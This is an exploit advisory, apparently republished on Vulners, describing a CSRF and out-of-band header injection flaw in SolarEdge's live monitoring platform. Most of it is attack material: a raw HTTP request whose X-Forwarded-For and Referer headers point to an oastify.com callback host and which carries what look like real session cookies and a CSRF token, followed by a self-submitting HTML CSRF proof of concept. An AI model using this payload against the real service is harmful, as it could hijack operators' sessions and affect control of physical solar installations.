Vulners
Lucene search
solaredge - (CSRF-OOB-Injection)
# Titles: solaredge - (CSRF-OOB-Injection)
# Author: nu11secur1tyAI
# Date: 2026-04-26
# Vendor: SolarEdge Technologies Ltd.
# Software: SolarEdge Monitoring Platform - Framework /solaredge-web/
# Reference: https://monitoring.solaredge.com/
## Description:
The solaredge-CSRF-Hijack vulnerability arises due to a critical business
logic flaw in the `/solaredge-web/p/initClient` endpoint. The system allows
the generation and overwriting of session parameters (`createCookie`) via
POST requests that are not properly validated against their origin.
An attacker can exploit this flaw to force a legitimate operator's browser
to execute unauthorized commands without their knowledge. Additionally, an
Out-of-Band (OOB) injection vulnerability was discovered via the
`X-Forwarded-For` and `Referer` headers. By manipulating these headers, an
attacker forces the SolarEdge internal infrastructure to initiate requests
to external, attacker-controlled domains (e.g., oastify.com or a custom
malicious site). This demonstrates a lack of framework-level filtration,
leading to session compromise and potential unauthorized control over
physical photovoltaic systems.
STATUS: MEDIUM - HIGH/ Vulnerability
[+]Payload:
``` POST
POST
/solaredge-web/p/initClient?cmd=createCookie&target=login&client=touch%3Afalse%7Ccsstransforms3d%3Atrue%7Cgeneratedcontent%3Atrue%7Cfontface%3Atrue%7Cflexbox%3Atrue%7Ccanvas%3Atrue%7Ccanvastext%3Atrue%7Cwebgl%3Atrue%7Cgeolocation%3Atrue%7Cpostmessage%3Atrue%7Cwebsqldatabase%3Afalse%7Cindexeddb%3Atrue%7Chashchange%3Atrue%7Chistory%3Atrue%7Cdraganddrop%3Atrue%7Cwebsockets%3Atrue%7Crgba%3Atrue%7Chsla%3Atrue%7Cmultiplebgs%3Atrue%7Cbackgroundsize%3Atrue%7Cborderimage%3Atrue%7Cborderradius%3Atrue%7Cboxshadow%3Atrue%7Ctextshadow%3Atrue%7Copacity%3Atrue%7Ccssanimations%3Atrue%7Ccsscolumns%3Atrue%7Ccssgradients%3Atrue%7Ccssreflections%3Atrue%7Ccsstransforms%3Atrue%7Ccsstransitions%3Atrue%7Cvideo%3A%7Cogg%3Afalse%7Ch264%3Afalse%7Cwebm%3Atrue%7Caudio%3A%7Cogg%3Atrue%7Cmp3%3Atrue%7Cwav%3Atrue%7Cm4a%3Afalse%7Clocalstorage%3Atrue%7Csessionstorage%3Atrue%7Cwebworkers%3Atrue%7Capplicationcache%3Afalse%7Csvg%3Atrue%7Cinlinesvg%3Atrue%7Csmil%3Atrue%7Csvgclippaths%3Atrue%7Cinput%3A%7Cautocomplete%3Atrue%7Cautofocus%3Atrue%7Clist%3Atrue%7Cplaceholder%3Atrue%7Cmax%3Atrue%7Cmin%3Atrue%7Cmultiple%3Atrue%7Cpattern%3Atrue%7Crequired%3Atrue%7Cstep%3Atrue%7Cinputtypes%3A%7Csearch%3Atrue%7Ctel%3Atrue%7Curl%3Atrue%7Cemail%3Atrue%7Cdatetime%3Afalse%7Cdate%3Atrue%7Cmonth%3Atrue%7Cweek%3Atrue%7Ctime%3Atrue%7Cdatetime-local%3Atrue%7Cnumber%3Atrue%7Crange%3Atrue%7Ccolor%3Atrue%7Cfileapi%3Atrue%7Cfullscreen%3Atrue%7CclientWidth%3A800%7CclientHeight%3A600%7CwindowInnerWidth%3A1920%7CwindowInnerHeight%3A1080%7CwindowMaxWidth%3A800%7CwindowMaxHeight%3A600%7Cflash%3Atrue%7Cmobile%3Afalse%7Cphone%3Afalse%7Ctablet%3Afalse%7Cie11%3Afalse%7Ces6%3Atrue
HTTP/2
Host: monitoring.solaredge.com
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="146", "Not;A=Brand";v="24", "Google Chrome";v="146"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
X-Forwarded-For: cn3iam50ywo00n2a5vvi3o59r0xrln9c.oastify.com
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept: */*
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Cookie:
JSESSIONID=6F1B6162792D05EFCE515BF203A1921E9D85FA41057990C6C526B90DAEB5D65BFE52B0034F4F2D5B10424FFE2CBA711A654936F114998927041CA486611931EE3C0F205C04CA429EC894DF7A64DE9DB5108F3140B957001C751D7A57EF756DDD7971301F05C962751C9CA2F4D39478356BDF1D2ABEF343E3B0C8D5D9FF19A8F2;
cf_clearance=DtyVi9hHPwvwTxW7i3XtdkHyMQmr.8bxpKOx7YOux2k-1777189382-1.2.1.1-Oe0DEHsLmJqAbUfnWsvheB8svxkc8b6u25VOWn6Q5.47kl..hy7lFUAWAFjjxFt3iVZDZvc.3dByQVMD7OKuyNedVj14sw4mf3ixhjjUzo.u8AbMMvMzr3dTFA.4ZMxREUB6w_km08hdN2Q9dqPdyl6a3Yo2ClDEosIsGuHs5gZkTMybd50CzjFB8UhCMfJDkUND4ZgT7yhn9nuwGnRpOdiW9xeQyMCzd52WXjDuGnrAADkNCbkOM.6VcWypMaA.f2gz2TVRI9gXPqpGBlnxTiwQB25NHZe_oxGVldzLBNdG0M42RlULw5G7DAcF_r1wh.UGpZYS8D4007p9.A_OAQ;
__cf_bm=PxF5ZT6Bu4Jvd86dcTD_ayOFIDAo62QeOUj7C0QEn_s-1777189382.1867328-1.0.1.1-8S0957YKxPKpytYZZF4ullyTfKTwS8YpjtVRZlwNMROgEmHBO4fsAHVXdp6MPfQTg3igFXX.Ec4FXoaC5N3gaRAqF8uuepOG1x26_eex8fjMXRd9Mldj1PH43.f.p2Yb;
CSRF-TOKEN=38962BC08EC10395F7DE6C11BC3794A98C5AF2B9B56066AC1830F7780E4C8394BA3D0CA2E2D5148E0BB52B778A7C8A11FD90
Origin: https://monitoring.solaredge.com
Referer:
http://cn3iam50ywo00n2a5vvi3o59r0xrln9c.oastify.com/vulnerabilities/
Content-Length: 0
```
[+]Exploit:
```html
<html>
<!-- CSRF PoC -->
<body>
<form action="
https://monitoring.solaredge.com/solaredge-web/p/initClient?cmd=createCookie&target=login&client=touch%3Afalse%7Ccsstransforms3d%3Atrue%7Cgeneratedcontent%3Atrue%7Cfontface%3Atrue%7Cflexbox%3Atrue%7Ccanvas%3Atrue%7Ccanvastext%3Atrue%7Cwebgl%3Atrue%7Cgeolocation%3Atrue%7Cpostmessage%3Atrue%7Cwebsqldatabase%3Afalse%7Cindexeddb%3Atrue%7Chashchange%3Atrue%7Chistory%3Atrue%7Cdraganddrop%3Atrue%7Cwebsockets%3Atrue%7Crgba%3Atrue%7Chsla%3Atrue%7Cmultiplebgs%3Atrue%7Cbackgroundsize%3Atrue%7Cborderimage%3Atrue%7Cborderradius%3Atrue%7Cboxshadow%3Atrue%7Ctextshadow%3Atrue%7Copacity%3Atrue%7Ccssanimations%3Atrue%7Ccsscolumns%3Atrue%7Ccssgradients%3Atrue%7Ccssreflections%3Atrue%7Ccsstransforms%3Atrue%7Ccsstransitions%3Atrue%7Cvideo%3A%7Cogg%3Afalse%7Ch264%3Afalse%7Cwebm%3Atrue%7Caudio%3A%7Cogg%3Atrue%7Cmp3%3Atrue%7Cwav%3Atrue%7Cm4a%3Afalse%7Clocalstorage%3Atrue%7Csessionstorage%3Atrue%7Cwebworkers%3Atrue%7Capplicationcache%3Afalse%7Csvg%3Atrue%7Cinlinesvg%3Atrue%7Csmil%3Atrue%7Csvgclippaths%3Atrue%7Cinput%3A%7Cautocomplete%3Atrue%7Cautofocus%3Atrue%7Clist%3Atrue%7Cplaceholder%3Atrue%7Cmax%3Atrue%7Cmin%3Atrue%7Cmultiple%3Atrue%7Cpattern%3Atrue%7Crequired%3Atrue%7Cstep%3Atrue%7Cinputtypes%3A%7Csearch%3Atrue%7Ctel%3Atrue%7Curl%3Atrue%7Cemail%3Atrue%7Cdatetime%3Afalse%7Cdate%3Atrue%7Cmonth%3Atrue%7Cweek%3Atrue%7Ctime%3Atrue%7Cdatetime-local%3Atrue%7Cnumber%3Atrue%7Crange%3Atrue%7Ccolor%3Atrue%7Cfileapi%3Atrue%7Cfullscreen%3Atrue%7CclientWidth%3A800%7CclientHeight%3A600%7CwindowInnerWidth%3A1920%7CwindowInnerHeight%3A1080%7CwindowMaxWidth%3A800%7CwindowMaxHeight%3A600%7Cflash%3Atrue%7Cmobile%3Afalse%7Cphone%3Afalse%7Ctablet%3Afalse%7Cie11%3Afalse%7Ces6%3Atrue"
method="POST">
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
```
# Demo:
[href](https://www.patreon.com/posts/solaredge-csrf-156577436)
# Time spent:
01:25:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 May 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8